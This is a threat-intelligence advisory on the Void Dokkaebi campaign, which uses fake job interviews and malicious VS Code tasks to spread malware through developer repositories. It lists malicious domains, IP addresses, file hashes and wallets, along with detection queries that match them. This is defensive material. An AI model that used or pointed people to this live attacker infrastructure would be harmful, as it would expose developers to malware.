Void Dokkaebi Uses Fake Job Interview Lure to Spread Malware via Code Repositories

    Wednesday, April 22, 2026 In: Threat Research Print

    Date: 04/22/2026

    Severity: High

    Summary

    Void Dokkaebi (Famous Chollima) has advanced from targeted social engineering into a self-spreading supply chain threat. Compromised developer repositories act as infection hubs, propagating malware across the developer ecosystem like a worm. It exploits trusted workflows using malicious VS Code tasks and injected code that runs during normal development. Infected code can spread further through open-source projects, exposing contributors, forks, and downstream users. By March 2026, over 750 repositories were affected, leveraging blockchain platforms for resilient payload delivery.

    Indicators of Compromise (IOC) List

    Domains/URLs :

    vscode-config-settings.vercel.app

    vscode-extension-260120.vercel.app

    vscode-settings-config.vercel.app

    vscode-settings-bootstrap.vercel.app

    vscode-extensions-bootstrap.vercel.app

    davhub88.vercel.app

    chvsvr.short.gy

    PEsnCV.short.gy

    cgbrandh.short.gy

    lackservice.short.gy

    gurucooldown.short.gy

    codeviewer-three.vercel.app

    coreviewer.vercel.app

    vscode-helper171.vercel.app

    task-hrec.vercel.app

    vscode-bootstrapper.vercel.app

    vscode-production-setting.vercel.app

    vscode-toolkit-settings.vercel.app

    tailwind-version-4.vercel.app

    default-configuration-sandy.vercel.app

    260120.vercel.app

    vscode-ext-git.vercel.app

    thopywork.vercel.app

    regioncheck.xyz

    vscode-config.vercel.app

    vscode-helper171-ruby.vercel.app

    isvalid-regions.vercel.app

    vscode-config-setting.vercel.app

    vscode-settings-config-md.vercel.app

    default-configuration.vercel.app

    ext-checkedin.vercel.app

    data-kappa.vercel.app

    IP Address :

    136.0.9.8

    198.105.127.210

    23.27.202.27

    154.91.0.196

    23.27.20.143

    85.239.62.36

    83.168.68.219

    166.88.4.2

    23.27.120.142

    Hash : 

    23e37cf4e2a7d55ed107b3bc3eb7812a0e3d8f90b23b0c8f549d5c10d089a2c8

    834a92277f1bd82d4d473ac0aa2ddb23208a3a8763a576b882e7326c42bc5412

    Wallet : 

    TA48dct6rFW8BXsiLAtjFaVFoSuryMjD3v

    0x533b2dbcaeff19cd1f799234a27b578d713d8fcaa341b7501e4526106483e0b1

    TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG

    0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3

    TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP

    0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "chvsvr.short.gy" or url like "chvsvr.short.gy" or siteurl like "chvsvr.short.gy" or domainname like "default-configuration.vercel.app" or url like "default-configuration.vercel.app" or siteurl like "default-configuration.vercel.app" or domainname like "coreviewer.vercel.app" or url like "coreviewer.vercel.app" or siteurl like "coreviewer.vercel.app" or domainname like "tailwind-version-4.vercel.app" or url like "tailwind-version-4.vercel.app" or siteurl like "tailwind-version-4.vercel.app" or domainname like "vscode-extension-260120.vercel.app" or url like "vscode-extension-260120.vercel.app" or siteurl like "vscode-extension-260120.vercel.app" or domainname like "vscode-settings-config.vercel.app" or url like "vscode-settings-config.vercel.app" or siteurl like "vscode-settings-config.vercel.app" or domainname like "vscode-settings-bootstrap.vercel.app" or url like "vscode-settings-bootstrap.vercel.app" or siteurl like "vscode-settings-bootstrap.vercel.app" or domainname like "task-hrec.vercel.app" or url like "task-hrec.vercel.app" or siteurl like "task-hrec.vercel.app" or domainname like "regioncheck.xyz" or url like "regioncheck.xyz" or siteurl like "regioncheck.xyz" or domainname like "260120.vercel.app" or url like "260120.vercel.app" or siteurl like "260120.vercel.app" or domainname like "cgbrandh.short.gy" or url like "cgbrandh.short.gy" or siteurl like "cgbrandh.short.gy" or domainname like "vscode-ext-git.vercel.app" or url like "vscode-ext-git.vercel.app" or siteurl like "vscode-ext-git.vercel.app" or domainname like "vscode-toolkit-settings.vercel.app" or url like "vscode-toolkit-settings.vercel.app" or siteurl like "vscode-toolkit-settings.vercel.app" or domainname like "vscode-production-setting.vercel.app" or url like "vscode-production-setting.vercel.app" or siteurl like "vscode-production-setting.vercel.app" or domainname like "vscode-helper171.vercel.app" or url like "vscode-helper171.vercel.app" or siteurl like "vscode-helper171.vercel.app" or domainname like "vscode-helper171-ruby.vercel.app" or url like "vscode-helper171-ruby.vercel.app" or siteurl like "vscode-helper171-ruby.vercel.app" or domainname like "default-configuration-sandy.vercel.app" or url like "default-configuration-sandy.vercel.app" or siteurl like "default-configuration-sandy.vercel.app" or domainname like "vscode-config-setting.vercel.app" or url like "vscode-config-setting.vercel.app" or siteurl like "vscode-config-setting.vercel.app" or domainname like "codeviewer-three.vercel.app" or url like "codeviewer-three.vercel.app" or siteurl like "codeviewer-three.vercel.app" or domainname like "vscode-settings-config-md.vercel.app" or url like "vscode-settings-config-md.vercel.app" or siteurl like "vscode-settings-config-md.vercel.app" or domainname like "ext-checkedin.vercel.app" or url like "ext-checkedin.vercel.app" or siteurl like "ext-checkedin.vercel.app" or domainname like "data-kappa.vercel.app" or url like "data-kappa.vercel.app" or siteurl like "data-kappa.vercel.app" or domainname like "isvalid-regions.vercel.app" or url like "isvalid-regions.vercel.app" or siteurl like "isvalid-regions.vercel.app" or domainname like "PEsnCV.short.gy" or url like "PEsnCV.short.gy" or siteurl like "PEsnCV.short.gy" or domainname like "thopywork.vercel.app" or url like "thopywork.vercel.app" or siteurl like "thopywork.vercel.app" or domainname like "vscode-config-settings.vercel.app" or url like "vscode-config-settings.vercel.app" or siteurl like "vscode-config-settings.vercel.app" or domainname like "vscode-config.vercel.app" or url like "vscode-config.vercel.app" or siteurl like "vscode-config.vercel.app" or domainname like "vscode-bootstrapper.vercel.app" or url like "vscode-bootstrapper.vercel.app" or siteurl like "vscode-bootstrapper.vercel.app" or domainname like "vscode-extensions-bootstrap.vercel.app" or url like "vscode-extensions-bootstrap.vercel.app" or siteurl like "vscode-extensions-bootstrap.vercel.app" or domainname like "davhub88.vercel.app" or url like "davhub88.vercel.app" or siteurl like "davhub88.vercel.app" or domainname like "lackservice.short.gy" or url like "lackservice.short.gy" or siteurl like "lackservice.short.gy" or domainname like "gurucooldown.short.gy" or url like "gurucooldown.short.gy" or siteurl like "gurucooldown.short.gy"

    Detection Query 2 :

    dstipaddress IN ("198.105.127.210","136.0.9.8","23.27.20.143","23.27.202.27","23.27.120.142","85.239.62.36","166.88.4.2","154.91.0.196","83.168.68.219") or srcipaddress IN ("198.105.127.210","136.0.9.8","23.27.20.143","23.27.202.27","23.27.120.142","85.239.62.36","166.88.4.2","154.91.0.196","83.168.68.219")

    Detection Query 3 :

    sha256hash IN ("834a92277f1bd82d4d473ac0aa2ddb23208a3a8763a576b882e7326c42bc5412","23e37cf4e2a7d55ed107b3bc3eb7812a0e3d8f90b23b0c8f549d5c10d089a2c8")

    Reference:    

    https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html


    Tags

    MalwareSocial EngineeringExploitWormBlockchainGitHub

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.